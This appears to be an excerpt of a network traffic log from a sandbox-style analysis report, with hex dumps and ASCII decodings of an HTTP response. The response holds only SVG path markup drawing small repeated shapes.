                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3649INData Raw: 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 35 37 2c 31 30 32 2e 30 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 33 31 2c 39 34 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e
                                                                                                                                                                                                                                                        Data Ascii: 8"/><path class="cls-7" d="M610.57,102.07a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.31,94.36a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1,2.67,2.
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3665INData Raw: 38 2e 31 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2e 32 38 2c 31 37 30 2e 34 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c
                                                                                                                                                                                                                                                        Data Ascii: 8.17a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644.28,170.46a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3681INData Raw: 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2e 32 35 2c 32 34 36 2e 35 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                        Data Ascii: .87,2.48,2.78,2.78,0,0,1-3.71-1,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M678.25,246.56a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3697INData Raw: 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 39 37 2e 30 37 2c 31 30 36 2e 38 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 39 36 2e 38 31 2c
                                                                                                                                                                                                                                                        Data Ascii: 7,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M697.07,106.87a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M696.81,
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3713INData Raw: 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 33 31 2c 31 38 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 33 30 2e 37 38 2c 31 37 35 2e 32 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c
                                                                                                                                                                                                                                                        Data Ascii: .36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M731,183a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M730.78,175.26a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3729INData Raw: 36 35 2c 32 35 39 2e 30 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 37 35 2c 32 35 31 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35
                                                                                                                                                                                                                                                        Data Ascii: 65,259.07a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.75,251.36a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.5
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3745INData Raw: 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 35 33 2e 33 34 2c 32 36 38 2e 32 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 35 33 2e 34 32 2c 32 35 39 2e 35 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30
                                                                                                                                                                                                                                                        Data Ascii: 66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M653.34,268.22a2.16,2.16,0,0,1-1.09,2.75,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M653.42,259.54a2.16,2.16,0,0,1-1.1,2.75,3.15,3.15,0,0
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3761INData Raw: 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 38 2e 30 38 2c 33 32 39 2e 32 39 41 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2c 36 38 37 2c 33 33 32 61 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 38 2e 31 35 2c 33 32 30 2e 36 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34
                                                                                                                                                                                                                                                        Data Ascii: 2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M688.08,329.29A2.16,2.16,0,0,1,687,332a3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M688.15,320.61a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3777INData Raw: 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 32 2e 38 31 2c 33 39 30 2e 33 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 32 2e 38 39 2c 33 38 31 2e 36 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35
                                                                                                                                                                                                                                                        Data Ascii: 1,0,3.58"/><path class="cls-9" d="M722.81,390.36a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M722.89,381.68a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3793INData Raw: 39 22 20 64 3d 22 4d 37 35 37 2e 35 35 2c 34 35 31 2e 34 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 36 32 2c 34 34 32 2e 37 36 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e
                                                                                                                                                                                                                                                        Data Ascii: 9" d="M757.55,451.44a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M757.62,442.76a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3809INData Raw: 32 2c 32 36 39 2e 33 39 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36
                                                                                                                                                                                                                                                        Data Ascii: 2,269.39a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.6
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3825INData Raw: 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 34 34 2c 33 32 31 2e 37 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38
                                                                                                                                                                                                                                                        Data Ascii: 1.09,2.76,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M820.44,321.78a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3841INData Raw: 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 35 2e 31 37 2c 33 38 32 2e 38 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73
                                                                                                                                                                                                                                                        Data Ascii: ,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M855.17,382.86a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3857INData Raw: 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 39 2e 39 31 2c 34 34 33 2e 39 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 39 30 2c 34 33 35 2e 32 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e
                                                                                                                                                                                                                                                        Data Ascii: ,2.82,2.82,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"/><path class="cls-9" d="M889.91,443.93a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.2,2.64,2.64,0,0,1,0,3.57"/><path class="cls-9" d="M890,435.25a2.16,2.16,0,0,1-1.
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3873INData Raw: 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 38 2c 32 36 31 2e 38 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 38 2e 30 36 2c 32 35 33 2e 32 31 41 32 2e 31 35 2c 32 2e
                                                                                                                                                                                                                                                        Data Ascii: ,.8-3.58,2.81,2.81,0,0,1,3.61.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M918,261.89a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M918.06,253.21A2.15,2.
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3889INData Raw: 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 35 32 2e 37 32 2c 33 32 33 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 35 32 2e 38 2c 33 31 34 2e 32 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c
                                                                                                                                                                                                                                                        Data Ascii: ,3.62.19,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M952.72,323a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M952.8,314.28a2.16,2.16,0,0,1-1.1,2.75,3.14,
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3905INData Raw: 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 38 37 2c 32 36 30 2e 34 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 35 38 2c 32 35 31 2e 36 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d
                                                                                                                                                                                                                                                        Data Ascii: class="cls-7" d="M59.87,260.41a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M59.58,251.63a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-
